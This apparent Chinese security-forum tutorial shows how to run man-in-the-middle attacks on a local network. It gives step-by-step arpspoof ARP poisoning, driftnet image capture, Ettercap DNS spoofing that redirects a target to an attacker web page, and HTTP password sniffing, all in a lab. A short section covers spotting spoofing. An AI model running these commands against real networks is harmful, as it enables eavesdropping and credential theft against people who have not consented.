电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1245 人浏览分享

无线安全之MiTM攻击

[复制链接]
1245 0
一、MiTM攻击简介

MiTM (Main-in-the-middle attack)中间人攻击 指攻击者与通讯的双方分别建立独立连接 。并交换其所收到的数据
使通讯的双方认为他们正在通过一个私密的连接与对方直接交互数据 但事实上整个会话都被攻击者完全控制 在中间
人攻击中 。攻击者可以拦截通讯双方的通话并插入新的内容。

中间人攻击具有一定的局限性 中间人攻击用于局域网内。MiTM攻击能成功的前提条件是攻击者能将自己伪装成每一个
参与会话的终端,并且不被其他终端识破。中间人攻击是一个(缺乏)相互认证的攻击。大多数的加密协议都专门加入
了一些特殊的认证方法以阻止中间人攻击。例如 SSL协议可以验证参与通讯的一方或双方使用的证书是否是由权威的受
信任的数字证书认证机构颁发,并且能执行双向身份认证。

二、arpspoof+driftnet截获图片数据流量

1、简介

MiTM攻击是通过劫持通讯双方的流量实现的 进行MiTM攻击时将攻击机置于受害机和路由器之间 攻击机可以
通过一些数据包嗅探工具(Wireshark等)监测到受害机上的流量。实现中间人攻击后 再通过driftnet工具抓
取指定接口的数据流,将获取到的图片信息保存至本地。

2、工具介绍

0x01 arpspoof

arpspoof是一款用于arp欺骗的工具 通过发送伪造包修改受害机的arp缓存 进而实现arp欺骗

使用方法:
  1. Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
复制代码

QQ截图20210805153534.png

参数
-i interface 指定要使用的接口。
-c own|host|both 指定范围own|host|both(自己|主机|两者)
-t target 指定一台特定主机进行ARP中毒(如果未指定,则为LAN上的所有主机)
-r 两个主机(主机和目标)以捕获两个方向的流量。(仅对-t有效)
host 指定您希望抓取数据包的host(通常是本地网关)
示例
arpspoof -i eth0 -t 192.168.112.141 192.168.112.1
# eth0为攻击者使用的网卡
# 192.168.112.14是受害机的IP
# 192.168.112.1是攻击目标的网关(截获到的数据转发到这)

0x02 driftnet

driftnet是一款简易的图片捕获工具 用于抓取指定接口数据流上的图片 同时也支持抓取音频文件。

工具安装:
  1. apt-get install driftnet
复制代码

QQ截图20210805153644.png

使用方法:
  1. driftnet -h
复制代码

QQ截图20210805153731.png

最常见的使用命令就是
  1. driftnet -i eth0
复制代码

3、arpspoof工具进行MiTM攻击(ARP欺骗)

实验环境信息
  1. 靶机: 192.168.112.136
  2. Kali Linux: 192.168.112.147
复制代码

1)开启IP地址路由转发功能

路由转发指根据网卡接收到的数据包发送至另一网卡上,再根据路由表的信息进行发送数据包
  1. echo 1 >/proc/sys/net/ipv4/ip_forward
复制代码

53858.png

2)使用arpspoof对靶机进行单向arp欺骗
  1. arpspoof -i eth0 -t 192.168.112.136 192.168.112.1
复制代码

9998.png

在靶机上可以看到所在局域网的网关的Mac地址已经被欺骗修改为Kali Linux的Mac地址
9997.png

3)使用arpspoof对靶机进行双向arp欺骗
上面进行的是单向欺骗 我们只能截取到靶机发送给网关的数据 无法获取到网关返回的响应数据 显然达
不到我们的截取监听目的,所以需要使用双向arp欺骗 这就可以截取到网关返回给靶机的响应数据包信
息从而达到监听的目的。

使用参数-r代表进行双向arp欺骗
  1. arpspoof -i eth0 -r 192.168.112.1 -t 192.168.112.136
复制代码

9996.png

4、driftnet工具捕获图片信息

使用driftnet工具监听指定接口 获取数据包的图片信息并保存下来

1)启动driftnet工具
  1. driftnet -i eth0
复制代码

9993.png

注:先开启arpspoof双向arp欺骗攻击再启动driftnet工具截取图片

2)靶机访问http协议的网站

如果是https协议的网站,数据的传输会经过加密处理,截取不到图片信息

这里演示访问www.4399.com网址

9992.png

3)将图片保存至本地
  1. driftnet -i eth0 -b -a -d /tmp/pic
复制代码

9991.png

5、Wireshark数据包分析

开启arp欺骗后 通过eth0接口可以截取到来自靶机192.168.112.136发送的数据包
  1. ip.src==192.168.112.136
复制代码

9990.png

三、Ettercap实现MiTM攻击(DNS/ARP欺骗)

1、简介

上文简单介绍通过ARP欺骗并截获到图片信息 攻击者通过工具作为中间人截取靶机和网关之间
的数据信息本节将介绍使用Ettercap工具实现DNS欺骗
DNS欺骗是指攻击者冒充域名服务器的一种欺骗行为 将特殊处理后的域名信息数据写入DNS解析器的缓存中
导致名称服务器返回不正确的结果记录。例如 IP地址。这会导致流量被转移到攻击者的计算机 或任何其他计
算机此时在攻击者的计算机上搭建一个web服务,那么受害机请求访问的页面会重定向到我们搭建的web页
面上造成DNS欺骗的效果。

2、Ettercap工具介绍

Ettercap是一款局域网内的MiTM攻击工具 用于分析网络协议和安全审计 能够截获一个网段上
的流量捕获密码,并对许多常见协议进行主动窃听。
Ettercap的工作原理是将网络接口置于混杂模式 并通过ARP欺骗目标机器 因此 它可以充当一个中间人对受
害者发动各种攻击。Ettercap支持插件 因此可以通过添加新插件来扩展特性。
Ettercap工具提供了图形化界面和命令行界面 命令ettercap -G开启GUI图形化界面模式

3、DNS欺骗过程及效果

0x01开启IP转发
  1. sysctl -w net.ipv4.ip_forward=1

  2. sysctl net.ipv4.ip_forward  # 查看参数
复制代码

8999.png

0x02 攻击机.上启动web服务

1)开启apache
  1. /etc/init.d/apache2 start   # 启动服务
  2. /etc/init.d/apache2 status  # 查看状态
  3. /etc/init.d/apache2 stop    # 停止服务
复制代码

2)搭建index.html页面

前往/var/www/html目录下修改index.html文件
  1. <HTML>
  2. <head>
  3. <title>DNS SPOOF</title>
  4. <h1>hello, User.....!!</h1>
  5. <body>
  6. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used
  7. for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems in
  8. cluding Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a
  9. network segment, capturing passwords, and conducting active eavesdropping against a number of common
  10. protocols. Its original developers later founded Hacking Team.
  11. </body>
  12. </head>
  13. </HTML>
复制代码

8998.png

0x03 设置Ettercap配置文件etter.dns

在/etc/ettercap目录下修改etter.dns文件

8996.png

在最后添加重定向的规则
* A 192.168.112.147
* 代表靶机访问任何网页
A记录: 将域名指向一个IPv4地址
192.168.112.147 表示访问的任何网页都会重定向到这个IP上

8995.png

0x04 使用Ettercap进行DNS欺骗

1)启动页面

配置好后点击勾即可

8992.png

2)进行局域网Host扫描

选”Hosts“ - ”Scan for hosts“

8991.png

3)查看扫描的Hosts列表
网关IP 192.168.112.2
靶机IP 192.168.112.136

8990.png

4)分别添加攻击目标

选中靶机IP 点击Add to Target1 同样选中网关IP 添加至目标二

8989.png

5)进行arp欺骗

8988.png

6)进行DNS欺骗攻击

669.png

7)靶机访问网页

可以发现大部分网页已被DNS欺骗并劫持重定向至攻击机的web服务页面

668.png

此外也可以针对特定网站进行DNS欺骗并重定向 etter.dns的配置如下
  1. www.qq.com A 192.168.112.147
复制代码

那么靶机只有在访问www.qq.com的情况下会重定向至攻击机上在访
问其他任何网页时保持正常访问
命令行模式
  1. ettercap -Tq -M ARP:remote -i eth0 -P dns_spoof /192.168.112.136// /192.168.112.2//
  2. -T: 使用文本GUI,即命令行模式
  3. -q: 不显示数据内容
  4. -M: 执行一个MiTM攻击,后面跟攻击参数
  5. -i: 指定接口
  6. -P: 指定插件
复制代码

666.png

4、检查是否被DNS欺骗

0x01 查看arp表

如果arp表中的任何一条记录的Mac地址都不一致则代表没有被DNS欺骗 若出现有两条Mac
地址一致的情况下 则有可能被DNS欺骗ARP欺骗

665.png

0x02 通过ping命令

直接ping指定网站 如果请求的IP地址为局域网内的地址 说明被DNS欺骗

662.png

四、arpspoof+Ettercap密码嗅探

1、开启路由转发
  1. echo 1 >/proc/sys/net/ipv4/ip_forward
复制代码

2、arpspoof工具进行arp欺骗

使用arpspoof工具进行arp单向欺骗
  1. arpspoof -i eth0 -t 192.168.112.136 192.168.112.2
复制代码

661.png

3、ettercap监听靶机的密码数据流量
  1. ettercap -Tq -i eth0
复制代码

660.png

4、访问登录页面

这里只能截获http协议的密码数据流量 以4399和7k7k网站测试

659.png
658.png


五、总结

MiTM攻击 中间人攻击 主要就是在局域网内对靶机进行arp欺骗 从而截获到靶机发送的
流量数据 一般用于小型的网络中本文中介绍了目前几个较为常用的攻击方法 还有部分
MiTM攻击未复现留在之后更新补充

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.